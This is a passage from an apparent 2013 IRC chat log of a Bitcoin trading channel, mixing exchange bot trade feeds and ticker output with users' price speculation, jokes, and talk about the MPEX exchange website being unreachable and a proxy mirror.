won the bet.. LTC will reach 20cents Mar 06 12:21:30 .. damj Mar 06 12:21:37 I feel like I deserved a bit more coins Mar 06 12:21:42 dub, doesn't work. Mar 06 12:22:00 does for me Mar 06 12:22:35 504 Gateway Time-out Mar 06 12:22:36 nginx Mar 06 12:22:58 yep, none is working Mar 06 12:23:09 like someone cooked their router again Mar 06 12:27:03 [HAVELOCK] [HIM] 1 @ 1.6498 BTC [-] Mar 06 12:28:04 [HAVELOCK] [SDICE] 3 @ 0.42 = 1.26 BTC [+] Mar 06 12:28:05 [HAVELOCK] [SDICE] 17 @ 0.4 = 6.8 BTC [-] Mar 06 12:28:07 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [-] Mar 06 12:32:04 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Mar 06 12:32:05 [HAVELOCK] [SDICE] 1 @ 0.4 BTC [-] Mar 06 12:33:32 Ooh Mar 06 12:33:34 Look at Dice go Mar 06 12:33:35 lol Mar 06 12:33:40 I got out just in time Mar 06 12:34:55 [MPEX] [S.MPOE] 7200 @ 0.00073198 = 5.2703 BTC [+] Mar 06 12:35:04 [HAVELOCK] [SDICE] 3 @ 0.38 = 1.14 BTC [-] Mar 06 12:35:05 [HAVELOCK] [SDICE] 1 @ 0.38 BTC [-] Mar 06 12:35:07 [HAVELOCK] [SDICE] 4 @ 0.38 = 1.52 BTC [-] Mar 06 12:35:45 interesting... mpex offline but it does report trades Mar 06 12:36:29 at least mpex.coinbr.com works now Mar 06 12:38:26 [BTCTC] [S.DICE-PT] 84 @ 0.00549 = 0.4612 BTC [+] Mar 06 12:47:04 [HAVELOCK] [SDICE] 2 @ 0.5 = 1 BTC [+] Mar 06 12:47:15 I'll be a bro and give some of my friends an opportunity to buy BTC Mar 06 12:47:16 lol Mar 06 12:47:43 [BTCTC] [S.DICE-PT] 15 @ 0.00549 = 0.0824 BTC [+] Mar 06 12:50:24 lol wtf is this shit Mar 06 12:50:26 Kim Dotcom @KimDotcom Mar 06 12:50:26 #Megacard: I would love to create a #Bitcoin credit card! Who can help us make it happen? Email: twitter@kim.com Mar 06 12:55:40 that ianbakewell is gonna get slaughtered Mar 06 12:55:47 with 600 BTC loan Mar 06 12:57:38 ? Mar 06 12:58:56 ian borrowed 600 BTC when they were 34 dollars each Mar 06 13:01:47 btc-e is down Mar 06 13:02:37 For what purpose? Mar 06 13:02:45 I'm also borrowing BTC Mar 06 13:03:09 shorting? Mar 06 13:03:09 ,h, Mar 06 13:03:51 nah, I'll grab some S.DICE or stuff like that for my passthroughs while it's cheap. Mar 06 13:07:52 !ticker m s.dice Mar 06 13:08:14 Quest for vision is a great blessing. Mar 06 13:12:25 !ticker h s.dice Mar 06 13:12:28 Quest for vision is a great blessing. Mar 06 13:12:52 ask on bitstamp at 48 heh Mar 06 13:16:40 what's happening with MPEx? Mar 06 13:17:13 yeah..that's a good question Mar 06 13:17:28 i don't know. at least the backend works Mar 06 13:17:31 probably a DoS attack, happened a few weeks ago Mar 06 13:17:50 backend works... I guess the web interface is being updated Mar 06 13:19:15 it's more complicated... http://mpex.coinbr.com is a proxy (accepts orders/stat, too) Mar 06 13:19:40 and it works fine now (but it was not for a while, too) Mar 06 13:19:42 hi all Mar 06 13:19:49 whats up with mpex? Mar 06 13:20:01 hello, no idea Mar 06 13:20:11 coinbr works atm Mar 06 13:20:26 yep Mar 06 13:20:26 cuz we access alternate mpex ip Mar 06 13:20:30 ah nice Mar 06 13:20:57 but that can change anytime Mar 06 13:21:21 this is just crazy right now Mar 06 13:21:37 which part Mar 06 13:21:43 46? Mar 06 13:21:47 a that Mar 06 13:21:50 so fast Mar 06 13:22:12 i bought the 41 calls as a long shot Mar 06 13:22:28 :) Mar 06 13:22:50 apparently you shot accuratley on long distances Mar 06 13:24:26 coinbr user support is becoming fun. got another email "i bought C37Ts, now i'm selling and nobody wants them, help!" Mar 06 13:24:56 explained to him how to click Exercise link right on dashboard... Mar 06 13:25:16 but looks like thay sold in meantime anyway Mar 06 13:26:23 whale gobbled everything Mar 06 13:27:01 looks like we need to create MPOE Emergency Relief fund Mar 06 13:28:27 or MP can start selling extraordinary mpoe bonds Mar 06 13:33:08 troubled asset relief? Mar 06 13:33:36 why would he sell or exercise now? there is like 21 days left... Mar 06 13:34:11 he did not explain.. seems he didn't know what he's doing Mar 06 13:34:19 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Mar 06 13:34:22 kinda interesting Mar 06 13:34:59 Oo bitstamp is at 48? time to sell a bit Mar 06 13:40:03 [HAVELOCK] [SDICE] 6 @ 0.51 = 3.06 BTC [+] Mar 06 13:44:05 http://i.imgur.com/AAPO3vk.png Mar 06 13:44:22 i asked that question a week or so ago Mar 06 13:44:33 no answer in this chan Mar 06 13:44:43 thought we had smart ppl here. Mar 06 13:52:52 Rule 1. We do not know what is paypal Mar 06 13:53:09 Rule 2. Even if we know, we never speak about it. Mar 06 13:53:18 shit, might add that to the bitcoin-assets.com Mar 06 13:53:43 cause i herd its useless Mar 06 13:55:03 ;;asks 47 Mar 06 13:55:09 There are currently 5140.5779 bitcoins offered at or under 47.0 USD, worth 240829.255427 USD in total. | Data vintage: 0.0015 seconds Mar 06 13:55:31 ;;bids-35 Mar 06 13:55:32 Error: "bids-35" is not a valid command. Mar 06 13:58:44 bitcoin-central at 38.5 , bitstamp at 47, lol Mar 06 13:58:54 must do something about Mar 06 14:02:56 ;;ticker Mar 06 14:02:58 BTCUSD ticker | Best bid: 45.42009, Best ask: 45.42019, Bid-ask spread: 0.00010, Last trade: 45.42021, 24 hour volume: 99525.39008012, 24 hour low: 39.00000, 24 hour high: 46.93000, 24 hour vwap: 42.60348 Mar 06 14:03:06 crash Mar 06 14:03:16 ooooh the btccentral price is in eur.. even moar intriguing Mar 06 14:03:21 see you at single digits Mar 06 14:03:26 ;;bc,convert,eur Mar 06 14:03:26 Error: "bc,convert,eur" is not a valid command. Mar 06 14:03:33 ;;bc,convert eur Mar 06 14:03:34 1 BTC = 45.39100 U.S. dollars = 34.761066 Euros Mar 06 14:08:44 [BTCTC] [BASIC-MINING] 1 @ 0.34499 BTC [+] Mar 06 14:11:42 [BTCTC] [S.DICE-PT] 40 @ 0.00549 = 0.2196 BTC [+] Mar 06 14:13:03 Alt link for mpex? Getting ddosed? Mar 06 14:14:06 Bugpowder, mpex.coinbr.com Mar 06 14:14:27 Tx Mar 06 14:15:17 Wow .003 Mar 06 14:15:56 whats 0.003 Mar 06 14:16:29 Sdice Mar 06 14:16:38 ah Mar 06 14:16:43 ive seen it coming, really Mar 06 14:16:57 I called it first Mar 06 14:16:58 the dice is just worth as the month's volume Mar 06 14:17:06 well, I got out of the dice just in time lolz Mar 06 14:17:24 someone gave away over 300 BTC last night Mar 06 14:17:26 that was delicious Mar 06 14:18:03 [HAVELOCK] [SDICE] 2 @ 0.42 = 0.84 BTC [-] Mar 06 14:19:04 [HAVELOCK] [SDICE] 2 @ 0.4 = 0.8 BTC [-] Mar 06 14:20:07 also bug Mar 06 14:20:16 you were like.. dice is safe now, get back in Mar 06 14:20:19 i remember :P Mar 06 14:20:46 the overall profit doesnt really matter to a new shareholder Mar 06 14:20:53 its that month that matters Mar 06 14:20:54 lol Mar 06 14:23:34 Whatever Mar 06 14:23:48 It will bounce from here Mar 06 14:23:56 Or near hear Mar 06 14:24:09 Might take a few weeks Mar 06 14:24:17 I will wait Mar 06 14:24:33 techical support at 2.50 mBTC Mar 06 14:25:04 [HAVELOCK] [SDICE] 7 @ 0.38 = 2.66 BTC [-] Mar 06 14:27:59 [MPEX] [O.BTCUSD.C450T] 375 @ 0.19683239 = 73.8121 BTC [+] Mar 06 14:30:50 ian was right to short dice it seems Mar 06 14:31:02 shorting is such a ballsy move it scares me Mar 06 14:31:47 did i mention this here before, Mar 06 14:31:52 i am sure that he bitstamp owners Mar 06 14:31:55 do not use bitstamp. Mar 06 14:32:19 he=the Mar 06 14:32:54 http://www.reddit.com/r/Bitcoin/comments/19oiht/rbitcoin_lets_share_with_those_in_need_for_every/ Mar 06 14:32:55 Damn Mar 06 14:33:06 kakobrekla and now what should i think about that? Mar 06 14:33:08 I was posting this link last night anyone got their bitcoins Mar 06 14:33:26 i dont know, they are idiots Mar 06 14:34:07 judging from long-standing fee bugs i hear about, it may be as well true Mar 06 14:34:56 or they fear to fix it cuz they have no unit tests Mar 06 14:35:20 [MPEX] [S.MPOE] 1950 @ 0.00073247 = 1.4283 BTC [+] Mar 06 14:35:22 [MPEX] [S.MPOE] 11303 @ 0.00074548 = 8.4262 BTC [+] Mar 06 14:35:26 ;;asks 47 Mar 06 14:35:26 There are currently 4711.5328 bitcoins offered at or under 47.0 USD, worth 220954.276368 USD in total. | Data vintage: 115.7926 seconds Mar 06 14:36:18 sigh. i have updated the coinbr engine to use mpex track code, all fine and dandy Mar 06 14:36:21 the problem is most of bitcoins users are idiots as well Mar 06 14:36:30 to it goes along just fine. Mar 06 14:36:39 but now the unit tests must be fixed. and that's much bigger task Mar 06 14:37:15 and new ones added for the "track used/track not used" cases Mar 06 14:38:00 http://imgur.com/r/Bitcoin/UqYgqRy Mar 06 14:38:40 dis wrong. bitcoin is always mean. Mar 06 14:39:06 yes we are at the first selloff Mar 06 14:39:09 or something Mar 06 14:39:12 lol Mar 06 14:39:38 [MPEX] [S.MPOE] 16243 @ 0.00073204 = 11.8905 BTC [-] Mar 06 14:39:40 [MPEX] [S.MPOE] 1144 @ 0.00073198 = 0.8374 BTC [-] Mar 06 14:39:52 [MPEX] [S.MPOE] 5063 @ 0.0007313 = 3.7026 BTC [-] Mar 06 14:45:29 actually were in the take off phase Mar 06 14:55:11 ;;ticker Mar 06 14:55:12 BTCUSD ticker | Best bid: 46.20000, Best ask: 46.48800, Bid-ask spread: 0.28800, Last trade: 46.20000, 24 hour volume: 99179.19073160, 24 hour low: 39.00000, 24 hour high: 46.93000, 24 hour vwap: 42.70440 Mar 06 15:02:16 https://twitter.com/SilkRoadDrugs/status/309238128097517568 Mar 06 15:03:28 wtf is this shit Mar 06 15:03:55 !ticker m ^OIX Mar 06 15:04:17 Quest for vision is a great blessing. Mar 06 15:04:25 !ticker m ^OIX Mar 06 15:04:34 give me the option index dammit!!!!! Mar 06 15:04:48 The round stones beneath the earth... have spoken through the fire. Mar 06 15:05:35 !ticker m OIX^ Mar 06 15:05:50 47.45 Mar 06 15:05:56 Some are born to endless night. Mar 06 15:06:12 i guess assbot fails to access the website Mar 06 15:06:35 although it reports trades fine, dunno Mar 06 15:06:54 Nope, some are just born to endless night. Mar 06 15:08:42 ;;ticker Mar 06 15:08:43 BTCUSD ticker | Best bid: 46.23825, Best ask: 46.33559, Bid-ask spread: 0.09734, Last trade: 46.23824, 24 hour volume: 99397.65043641, 24 hour low: 39.00000, 24 hour high: 46.93000, 24 hour vwap: 42.72776 Mar 06 15:08:53 what do you know. i get richer just by fapping Mar 06 15:08:55 hehe Mar 06 15:09:59 url of webcam or didnt happen Mar 06 15:12:34 here, to help you whore out http://www.cam4btc.com/ Mar 06 15:13:09 unittests hacking brings nostalgia "Your order to BUY 1 O.BTCUSD.C110T @0.20000000BTC each has been received and will be processed." Mar 06 15:14:32 going even deeper "Your order to BUY 2 O.BTCUSD.P040T @0.00014536BTC each has been received" now they don't exist lol Mar 06 15:17:04 [HAVELOCK] [SDICE] 3 @ 0.38 = 1.14 BTC [-] Mar 06 15:19:03 [HAVELOCK] [SDICE] 2 @ 0.37 = 0.74 BTC [-] Mar 06 15:22:48 [MPEX] [S.MPOE] 8891 @ 0.0007313 = 6.502 BTC [-] Mar 06 15:32:35 [MPEX] [S.MPOE] 5356 @ 0.0007313 = 3.9168 BTC [-] Mar 06 15:35:17 [MPEX] [S.DICE] 300 @ 0.00414309 = 1.2429 BTC [+] Mar 06 15:37:06 mpex down? Mar 06 15:37:21 gesell yes, use mpex.coinbr.com Mar 06 15:37:28 we bought it Mar 06 15:37:41 what tha Mar 06 15:37:52 you what Mar 06 15:37:55 ? Mar 06 15:38:09 what happened to the vps that used to be on mpex? Mar 06 15:38:21 or was there? Mar 06 15:38:26 thought bitvps was there Mar 06 15:38:28 yup. went yest to timisoara and bought mpex, for a few lines of blow Mar 06 15:38:28 PsychoticBoy: Never hacked I think... he reported a DDOS outage a while back I believe. Mar 06 15:38:39 [MPEX] [S.MPOE] 989 @ 0.0007313 = 0.7233 BTC [-] Mar 06 15:38:41 [MPEX] [S.MPOE] 3700 @ 0.00072769 = 2.6925 BTC [-] Mar 06 15:38:56 [MPEX] [S.MPOE] 985 @ 0.00072612 = 0.7152 BTC [-] Mar 06 15:38:58 [MPEX] [S.MPOE] 7650 @ 0.00072378 = 5.5369 BTC [-] Mar 06 15:39:02 lol jurov Mar 06 15:39:04 [MPEX] [S.MPOE] 9050 @ 0.00071218 = 6.4452 BTC [-] Mar 06 15:39:14 [MPEX] [S.MPOE] 1550 @ 0.00071077 = 1.1017 BTC [-] Mar 06 15:39:55 jurov: this is insane Mar 06 15:41:44 gesell, you actually believe it? btw, i have picked up few nifty asic rigs en route in budapetst Mar 06 15:42:00 stop now! Mar 06 15:42:10 send me one Mar 06 15:42:43 btw, just posted this on redit but... pretty ascii graphs with: curl -s "http://bitcoincharts.com/t/trades.csv?symbol=mtgoxEUR&start=`date -v-1H +%s`" | gnuplot -e 'set datafile separator ","; set xdata time; set timefmt "%s"; unset key; set format x "%H%M"; set parametric; set y2tics; set tics nomirror out; set y2tics format "%.2f"; unset mxtics; set border 9; unset my2tics; unset ytics; set xtics scale 0; set term dumb; plot "-" using Mar 06 15:42:46 bah... i'm owning btc now, u think i'll just send someone somethig? Mar 06 15:43:57 jurov: sorry yeah i havent been in this room in a while so getting used to the troll factor again ;) Mar 06 15:48:41 [MPEX] [O.BTCUSD.P730T] 1 @ 0.90910719 BTC Mar 06 15:53:04 !ticker m s.dice Mar 06 15:53:27 Yeah. No damn tobacco, that's for sure. Mar 06 15:53:33 assbot feed donw :( Mar 06 16:02:55 ayo! https://bitcointalk.org/index.php?topic=99497.msg1590335#msg1590335 Mar 06 16:04:13 is there an official asicminer room here? Mar 06 16:04:26 i'm in #asicminer btw Mar 06 16:04:36 this is better than an asicminer room Mar 06 16:04:54 we have anything "official" in bitcoinland? Mar 06 16:05:40 this is officially official bitcoin chan Mar 06 16:06:12 nice padded walls Mar 06 16:06:22 hehe yeah this room is better Mar 06 16:06:25 more info Mar 06 16:06:29 official with Slightly Smoky Dragon and Double Cherry Truck insignia Mar 06 16:13:53 i can't get the only service that has never been hacked to come up Mar 06 16:14:16 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 06 16:14:33 its been hacked Mar 06 16:14:51 http://mpex.coinbr.com/ Mar 06 16:14:55 proxy site Mar 06 16:15:17 the front end http server is down, not the MPEX backend Mar 06 16:15:30 i told him to put yet on the end of his never been hacked sentence Mar 06 16:16:54 asic miner payment incoming :) Mar 06 16:16:57 i assume Mar 06 16:17:07 cuz testpaymesnt, oh i cant wait, muhahahah biiig money Mar 06 16:18:09 correcto :) Mar 06 16:18:20 its exciting ^_^ Mar 06 16:19:05 [HAVELOCK] [SDICE] 7 @ 0.381 = 2.667 BTC [+] Mar 06 16:19:06 [HAVELOCK] [SDICE] 10 @ 0.3801 = 3.801 BTC [-] Mar 06 16:19:08 [HAVELOCK] [SDICE] 3 @ 0.38 = 1.14 BTC [-] Mar 06 16:21:05 [HAVELOCK] [SDICE] 4 @ 0.38 = 1.52 BTC [-] Mar 06 16:22:39 hello, maybe the question was asked 10.000time but MPEX down ? :/ Mar 06 16:23:10 topic should be changed here maybe Mar 06 16:23:43 but http://mpex.coinbr.com/ Mar 06 16:24:01 [MPEX] [S.MPOE] 14300 @ 0.00070613 = 10.0977 BTC [-] Mar 06 16:24:02 try that Mar 06 16:24:36 it'a clone where you scam my gpg order ? Mar 06 16:24:52 ;) Mar 06 16:24:55 thanks Mar 06 16:25:10 nah the front of the server is down Mar 06 16:25:23 he is renting the host :) Mar 06 16:25:37 so they say Mar 06 16:25:40 why down ? attack ? Mar 06 16:25:45 thats only what i hear Mar 06 16:25:46 never! Mar 06 16:25:50 never! Mar 06 16:25:55 to much porn on server ? Mar 06 16:26:10 MP spreads way too luv for that Mar 06 16:27:15 haha thanks for this morning joke, need it Mar 06 16:27:58 think the cia kidnapped mircea again Mar 06 16:28:45 then prolly the domain would be seized Mar 06 16:29:10 must be the dns cache Mar 06 16:32:03 [HAVELOCK] [SDICE] 2 @ 0.46899999 = 0.938 BTC [+] Mar 06 16:32:04 [HAVELOCK] [SDICE] 5 @ 0.469 = 2.345 BTC [+] Mar 06 16:32:06 [HAVELOCK] [SDICE] 2 @ 0.46999999 = 0.94 BTC [+] Mar 06 16:32:07 [HAVELOCK] [SDICE] 10 @ 0.47 = 4.7 BTC [+] Mar 06 16:36:45 i think i'm getting the same amount of jah mining divs than i would at asicminer shares at 0.65 hah Mar 06 16:36:52 lol mircea_popescu got on bitinstants case but mpex is down Mar 06 16:37:12 anyone else finding that? Mar 06 16:37:27 mircea_popescu we summon thee! Mar 06 16:38:07 he took the money and ran Mar 06 16:38:13 mpex is scam after al Mar 06 16:38:16 all Mar 06 16:38:17 waaah Mar 06 16:38:18 waaah Mar 06 16:38:21 lol Mar 06 16:41:06 thestringpuller: i owe you some monies :) Mar 06 16:41:20 smickles! Mar 06 16:41:24 anduck too, if he's around Mar 06 16:41:44 oh hi smickles Mar 06 16:42:17 [MPEX] [S.MPOE] 3300 @ 0.00070613 = 2.3302 BTC [-] Mar 06 16:42:59 smickles returns, does he return with news of a second born? Mar 06 16:47:33 ;;ticker Mar 06 16:47:33 BTCUSD ticker | Best bid: 46.77107, Best ask: 46.78122, Bid-ask spread: 0.01015, Last trade: 46.77107, 24 hour volume: 94579.93372571, 24 hour low: 39.00000, 24 hour high: 46.93000, 24 hour vwap: 43.05662 Mar 06 16:48:08 who Mar 06 16:49:23 he took it down cause he don't wanna sell anymore calls. Mar 06 16:50:06 46.90 Mar 06 16:50:32 mpex down? Mar 06 16:50:40 mp ran with the btc or hacked? Mar 06 16:50:45 Chaang-Noi yes and no Mar 06 16:50:48 wh yis mPEX down? Mar 06 16:50:53 :) Mar 06 16:50:55 why is * Mar 06 16:51:09 dunno Mar 06 16:51:30 bug : haha Mar 06 16:51:44 sooo much call sold last week ! Mar 06 16:51:45 [MPEX] [S.MPOE] 4500 @ 0.00069034 = 3.1065 BTC [-] Mar 06 16:52:11 but the backend is working ( and proxied by mpex.coinbr.com ).. don't know why they can't move the domain elsewhere Mar 06 16:52:41 or make any statement Mar 06 16:53:00 !ticker h sdice Mar 06 16:53:02 [HAVELOCK:SDICE] 1D: 0.37000000 / 0.49368267 / 0.59000000 (622 shares, 307.07061895 BTC), 7D: 0.37000000 / 0.58757632 / 0.68950000 (1682 shares, 988.30336796 BTC), 30D: 0.37000000 / 0.6373535 / 0.76500000 (10868 shares, 6926.75789072 BTC) Mar 06 16:53:03 thanks for your proxy service jurov :) Mar 06 16:53:04 [HAVELOCK] [SDICE] 10 @ 0.401 = 4.01 BTC [-] Mar 06 16:53:05 < thestringpuller> smickles returns, does he return with news of a second born? shouldn't be until mid-may Mar 06 16:53:08 mp went to go do "human" things a few hours ago Mar 06 16:53:26 mpex is not down Mar 06 16:53:35 use one of the proxies Mar 06 16:53:36 i know I was just trolling Mar 06 16:54:03 [HAVELOCK] [SDICE] 3 @ 0.4 = 1.2 BTC [-] Mar 06 16:54:15 heh, i have excellent log-reading skills Mar 06 16:54:36 ;;ticker Mar 06 16:54:37 BTCUSD ticker | Best bid: 46.94000, Best ask: 47.00000, Bid-ask spread: 0.06000, Last trade: 47.00000, 24 hour volume: 97426.47255291, 24 hour low: 39.00000, 24 hour high: 47.00000, 24 hour vwap: 43.18923 Mar 06 16:56:43 $47.50 Mar 06 16:56:51 !ticker mpex Mar 06 16:56:51 I haven't understood a single word you've said since I met you, not one single word. Mar 06 16:56:52 smickles, I take it as you reading 3 weeks of this chan logs? Mar 06 16:57:15 !ticker mpex sdice Mar 06 16:57:22 Selling into this rally Mar 06 16:57:23 jurov: I Mar 06 16:57:26 er, Mar 06 16:57:27 this pace is stupid Mar 06 16:57:30 jurov: i'm trying Mar 06 16:57:37 You know, I've had it up to here with this Indian malarkey. Mar 06 16:57:56 !ticker mpex s.dice Mar 06 16:58:18 You know, I've had it up to here with this Indian malarkey. Mar 06 16:58:19 Thanks jurov Mar 06 16:58:33 !ticker mpex s.dice Mar 06 16:58:39 assbot got some malarkey Mar 06 16:58:48 ;;ticker Mar 06 16:58:48 BTCUSD ticker | Best bid: 47.01700, Best ask: 47.30807, Bid-ask spread: 0.29107, Last trade: 47.01700, 24 hour volume: 98301.12712212, 24 hour low: 39.00000, 24 hour high: 47.50000, 24 hour vwap: 43.22614 Mar 06 16:58:54 I prepared your canoe with cedar boughs. Mar 06 16:58:54 lol Mar 06 16:58:58 50$ today, i put some champagne in the fridge Mar 06 16:59:53 Where I can read logs of this channel so I ask 8% fewer stupid questions? Mar 06 17:00:01 parabolic top Mar 06 17:00:20 heresy! off with your head! Mar 06 17:00:26 dude Mar 06 17:00:31 [MPEX] [S.DICE] 1000 @ 0.00414309 = 4.1431 BTC [+] Mar 06 17:00:36 unbalanced, they aren't public afaik Mar 06 17:00:37 unbalanced: you might have to log it yourself Mar 06 17:00:45 there is going to be a major pullback Mar 06 17:00:48 ah thanks Mar 06 17:00:50 very very soon Mar 06 17:00:58 lemme guess. you bought puts? Mar 06 17:00:59 lol Mar 06 17:01:00 no Mar 06 17:01:04 not touching that shit Mar 06 17:01:06 there's a log somewhere online actually Mar 06 17:01:12 i stumbled on it at one point Mar 06 17:01:20 there will be a major pullback.. Mar 06 17:01:22 upwards Mar 06 17:01:23 :) Mar 06 17:01:35 ThickAsThieves: complete? not just some pastebin? Mar 06 17:01:40 cant remember Mar 06 17:02:38 [MPEX] [O.BTCUSD.P310T] 100 @ 0.06498108 = 6.4981 BTC [-] Mar 06 17:02:44 47 gone? Mar 06 17:02:49 ;;ticker Mar 06 17:02:50 BTCUSD ticker | Best bid: 47.50001, Best ask: 47.58770, Bid-ask spread: 0.08769, Last trade: 47.49990, 24 hour volume: 98269.41406670, 24 hour low: 39.00000, 24 hour high: 47.58770, 24 hour vwap: 43.23820 Mar 06 17:02:55 man... Mar 06 17:02:57 insane Mar 06 17:03:08 !ticker h sdice Mar 06 17:03:09 amazon partnered up with bitinstant Mar 06 17:03:10 [HAVELOCK:SDICE] 1D: 0.37000000 / 0.4917805 / 0.59000000 (635 shares, 312.28061895 BTC), 7D: 0.37000000 / 0.58614358 / 0.68950000 (1695 shares, 993.51336796 BTC), 30D: 0.37000000 / 0.63707085 / 0.76500000 (10881 shares, 6931.96789072 BTC) Mar 06 17:03:12 fun stuff Mar 06 17:03:14 fastcash4bitcoins is out Mar 06 17:03:17 of cash Mar 06 17:03:31 not shocked, i got 13k out of them at 35$ Mar 06 17:03:39 it was bitinstant actually Mar 06 17:03:39 http://www.fortmilltimes.com/2013/03/06/2538174/bitpay-integrates-bitcoin-with.html Mar 06 17:03:40 lol Mar 06 17:03:42 gg Mar 06 17:03:50 .. and i kinda feel bad for dice owners Mar 06 17:04:07 meh.. tomorrow it may change Mar 06 17:04:15 s.DICE will bounce Mar 06 17:04:17 yeah, trance #4 will be dumped Mar 06 17:04:17 don't worry about us - a bounce back is coming Mar 06 17:04:24 and it will bounce down Mar 06 17:04:33 although I like divs Mar 06 17:04:54 just can I get them out before SEC finds a way to prosecute. :P Mar 06 17:05:14 mhm.. it looks like an opportunity to arb s.dice at havelock Mar 06 17:05:22 buy at 0.37, sell at 0,.46 Mar 06 17:05:26 rinse and repeat Mar 06 17:05:30 then i'll hide evoorhees in my apt.. and won't be alone i guess Mar 06 17:05:33 The last bubble top was a $13 rise in one day Mar 06 17:05:52 then crash of $22 in 3 days Mar 06 17:06:03 you should sell the btcs now if they are gonna crash Mar 06 17:06:10 its very hard to predict the top Mar 06 17:06:48 I tried to give away 1 BTC to a gaming website Mar 06 17:06:51 I just got laughed at Mar 06 17:06:52 lol Mar 06 17:07:01 gamefaqs.. Mar 06 17:07:02 bah Mar 06 17:07:03 howdy... what's up with MPEX right now, DDoS or what? Mar 06 17:07:06 we are now up over $10 in the last 24 hours. Mar 06 17:07:11 mpex.coinbr.com Mar 06 17:07:41 what are you trying to say Bugpowdrr ? Mar 06 17:07:51 pAnIc! Mar 06 17:08:09 I'm trying to say that I'm am selling 25% Mar 06 17:08:21 charities will accept more BTC.. there was a campaign last night about BTC Mar 06 17:08:30 mpex down? Mar 06 17:08:32 about $12000 was given away in BTC Mar 06 17:08:46 mpex.coinbr.com Mar 06 17:08:48 to various charities, from $20-100 dollars ea Mar 06 17:08:49 Bugpowdrr: so that was you buying puts at 31? Mar 06 17:08:56 uh? Mar 06 17:09:00 I don't remember Mar 06 17:09:01 I did Mar 06 17:09:05 a while ago Mar 06 17:09:07 but closed them Mar 06 17:09:12 mpex seems down from here. Mar 06 17:09:13 at 28.5 Mar 06 17:09:38 does ddos count as a hack? Mar 06 17:09:44 nop Mar 06 17:09:51 not imo anyway Mar 06 17:10:04 and it's not down, all the proxies are working Mar 06 17:10:17 does a nuke count as a slap on the wrist Mar 06 17:10:21 so it's really just the one url which is down Mar 06 17:10:53 ;;ticker Mar 06 17:10:54 BTCUSD ticker | Best bid: 47.51677, Best ask: 47.58770, Bid-ask spread: 0.07093, Last trade: 47.58770, 24 hour volume: 98083.19810957, 24 hour low: 39.00000, 24 hour high: 47.75000, 24 hour vwap: 43.26076 Mar 06 17:10:56 is this where we panic? Mar 06 17:11:01 48 soon Mar 06 17:11:06 imsaguy, no Mar 06 17:11:07 seriously, one more person asking if mpex is down Mar 06 17:11:24 mpex has been hacked. hackers are dumping soon Mar 06 17:11:26 I swear its a bunch of 12 y/o lemmings in bitcoin Mar 06 17:11:28 #fakenews Mar 06 17:11:34 someone change the subject onthe channel Mar 06 17:11:47 [MPEX] [S.DICE] 2000 @ 0.00414309 = 8.2862 BTC [+] Mar 06 17:12:01 /topic mpex down, bitcoin to crash Mar 06 17:12:01 why? Mar 06 17:12:12 mircea has been kidnapped Mar 06 17:12:14 this is #bitcoin-assets, not ##mpex Mar 06 17:12:18 can i has $1,000,000 per BTC? Mar 06 17:12:33 imsaguy this is the shit. Mar 06 17:12:42 hi Mar 06 17:12:43 chmod755: i have an interested buyer, but they want the usd first Mar 06 17:12:49 imsaguy are you buying all these coins Mar 06 17:12:54 kakobrekla: urmom Mar 06 17:12:58 jcpham, only some Mar 06 17:12:58 smickles, wat Mar 06 17:13:00 NO U Mar 06 17:13:07 why EskimoBob? Mar 06 17:13:12 NO U Mar 06 17:13:19 pigeons: did you find the i in team? Mar 06 17:13:20 chmod755: nvm, bad joke Mar 06 17:13:27 its hidden in the A hole Mar 06 17:13:40 imsaguy: My wife's girlfriends are buying no Mar 06 17:13:41 now Mar 06 17:13:46 Time to get out Mar 06 17:13:53 yes it is hidden in ther A hole! Mar 06 17:13:53 Bugpowdrr: sounds for a kinky night Mar 06 17:14:47 1 BTC = 47.88000 U.S. dollars = 36.7375125 Euros Mar 06 17:14:47 ;;asks 48 Mar 06 17:14:53 we are crashing Mar 06 17:14:53 ;;asks 50 Mar 06 17:14:55 There are currently 464.05826 bitcoins offered at or under 48.0 USD, worth 22255.6760062 USD in total. | Data vintage: 0.0014 seconds Mar 06 17:14:55 There are currently 9879.8201 bitcoins offered at or under 50.0 USD, worth 489143.829799 USD in total. | Data vintage: 0.0038 seconds Mar 06 17:15:08 upwards Mar 06 17:15:28 i kinda think we need a correction, then i read more news and im wow... so i dont know Mar 06 17:15:46 yes this is the correction Mar 06 17:15:57 Cameras ready, prepare to crash Mar 06 17:16:03 Bug. when Mar 06 17:16:05 gimme a number Mar 06 17:16:07 >:) Mar 06 17:16:26 before i thought we might correct to 20, now im pretty sure we wont go much under 30 if we get tht far down... :/ Mar 06 17:17:06 49.88 is the top Mar 06 17:17:17 maybe Mar 06 17:18:06 ;;ticker Mar 06 17:18:06 I say the top is 51.33 Mar 06 17:18:08 BTCUSD ticker | Best bid: 48.00000, Best ask: 48.34801, Bid-ask spread: 0.34801, Last trade: 48.34801, 24 hour volume: 99201.77387837, 24 hour low: 39.00000, 24 hour high: 48.50000, 24 hour vwap: 43.35730 Mar 06 17:18:14 wow Mar 06 17:18:38 I don't want to go over the FACTA limit :-P Mar 06 17:18:41 low 39, high 48.5 Mar 06 17:18:50 no correction needed yet if we're on our way to 150 or such Mar 06 17:19:13 Mentlegen, we are the new wealty elite Mar 06 17:19:39 We need to focus on the bigger picture. Hookers and blow are gonna be so cheap for us.. real estate, ect Mar 06 17:19:45 $50k in foriegn account Mar 06 17:19:58 How about we think of a way to help the world Mar 06 17:19:58 triggers facta issues Mar 06 17:20:25 $10k is FBAR reporting req Mar 06 17:20:28 we can help the world by telling them to buy more coins Mar 06 17:20:38 it be hilarious if a small country's GDP would be like 10 BTC Mar 06 17:20:53 FATCA Mar 06 17:20:56 not FACTA sorry Mar 06 17:21:48 http://www.irs.gov/Businesses/Corporations/InformationforUSTaxpayers Mar 06 17:21:56 [MPEX] [S.DICE] 389 @ 0.00414309 = 1.6117 BTC [+] Mar 06 17:21:56 $4850 Mar 06 17:22:01 $48.50 Mar 06 17:23:15 .001BTC is apparently not enough off TXN fee anymore, is it? Mar 06 17:23:22 Bunch of bubbleheads in here Mar 06 17:23:52 [BTCTC] [S.DICE-PT] 200 @ 0.005025 = 1.005 BTC [-] Mar 06 17:24:09 LOL Mar 06 17:24:11 Bugpowdrr - since when (at what price) did you go negative? Mar 06 17:24:21 it's not so much the price Mar 06 17:24:26 as the RATE of increase Mar 06 17:24:26 how 